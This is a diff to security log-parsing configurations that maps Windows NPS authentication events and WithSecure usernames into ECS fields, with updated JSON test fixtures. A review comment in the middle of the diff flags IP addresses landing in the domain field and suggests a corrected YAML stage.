filter: "{{json.event.SourceAddr | is_ipaddress}}"
+ set_network_policy_fields:
+ actions:
+ - set:
+ source.ip: "{{ json.event.CallingStationID }}"
+ filter: "{{json.event.CallingStationID | is_ipaddress}}"
+ - set:
+ source.mac: "{{ json.event.CallingStationID }}"
+ filter: "{{ final.source.ip == null }}"
+ - set:
+ destination.domain: "{{ json.event.AuthenticationServer }}"
+
rule:
actions:
- set:
diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json
index 4a3212af2..20213504d 100644
--- a/Windows/windows/tests/Event_6272.json
+++ b/Windows/windows/tests/Event_6272.json
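Review bot: In the new `set_network_policy_fields` stage, `destination.domain` is set from `AuthenticationServer` unconditionally, so an IP-valued server lands in `destination.domain` instead of `destination.ip`; the updated `process_6272.json` test in this same diff pins exactly that outcome (`"domain": "1.2.3.4"` with no `destination.ip`, and `related.ip` holding only the source address). Splitting the assignment on `is_ipaddress`, mirroring the `source.ip`/`source.mac` pair just above it, keeps IP and hostname in their respective ECS fields. Separately, the `source.mac` action copies any non-IP `CallingStationID` verbatim, and that RADIUS attribute can hold a MAC, a phone number or nothing at all depending on the access server, so a format check on the value (a MAC pattern, if the engine exposes one) would avoid filling `source.mac` with arbitrary strings; this parser's `ignored_values` list is outside the hunk, so whether empty values are already dropped is not visible here.
```yaml
  set_network_policy_fields:
    actions:
      # … unchanged: source.ip / source.mac actions …
      - set:
          destination.ip: "{{ json.event.AuthenticationServer }}"
        filter: "{{ json.event.AuthenticationServer | is_ipaddress }}"
      - set:
          destination.domain: "{{ json.event.AuthenticationServer }}"
        filter: "{{ final.destination.ip == null }}"
```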
@@ -42,6 +42,14 @@
"record_id": 1674356873,
"type": "Security"
},
+ "destination": {
+ "address": "auth.example.org",
+ "domain": "auth.example.org",
+ "registered_domain": "example.org",
+ "size_in_char": 16,
+ "subdomain": "auth",
+ "top_level_domain": "org"
+ },
"host": {
"hostname": "hostname.example.org",
"name": "hostname.example.org"
@@ -63,6 +71,7 @@
},
"related": {
"hosts": [
+ "auth.example.org",
"hostname.example.org"
],
"user": [
diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json
index 8ad5a2226..118cf2445 100644
--- a/Windows/windows/tests/Event_6273.json
+++ b/Windows/windows/tests/Event_6273.json
@@ -42,6 +42,14 @@
"record_id": 783949626,
"type": "Security"
},
+ "destination": {
+ "address": "auth.example.org",
+ "domain": "auth.example.org",
+ "registered_domain": "example.org",
+ "size_in_char": 16,
+ "subdomain": "auth",
+ "top_level_domain": "org"
+ },
"host": {
"hostname": "hostname.example.org",
"name": "hostname.example.org"
@@ -63,6 +71,7 @@
},
"related": {
"hosts": [
+ "auth.example.org",
"hostname.example.org"
],
"user": [
diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json
index af1d9fe1d..3135f15c9 100644
--- a/Windows/windows/tests/process_6272.json
+++ b/Windows/windows/tests/process_6272.json
@@ -42,6 +42,11 @@
"record_id": 2324634,
"type": "Security"
},
+ "destination": {
+ "address": "1.2.3.4",
+ "domain": "1.2.3.4",
+ "size_in_char": 7
+ },
"host": {
"hostname": "test",
"name": "test"
@@ -63,12 +68,20 @@
},
"related": {
"hosts": [
+ "1.2.3.4",
"test"
],
+ "ip": [
+ "10.24.25.25"
+ ],
"user": [
"testUser"
]
},
+ "source": {
+ "address": "10.24.25.25",
+ "ip": "10.24.25.25"
+ },
"user": {
"domain": "NT01",
"id": "S-1-5-21-1111111111-111111111-1111111111-1111",
diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml
index 83bd21cff..3f8525c4d 100644
--- a/WithSecure/withsecure-elements/ingest/parser.yml
+++ b/WithSecure/withsecure-elements/ingest/parser.yml
@@ -17,6 +17,7 @@ pipeline:
external:
name: grok.match
properties:
+ raise_errors: false
input_field: "{{json_event.message.details.userName}}"
output_field: user
pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})"
@@ -25,6 +26,7 @@ pipeline:
external:
name: grok.match
properties:
+ raise_errors: false
input_field: "{{json_event.message.userName}}"
output_field: user
pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})"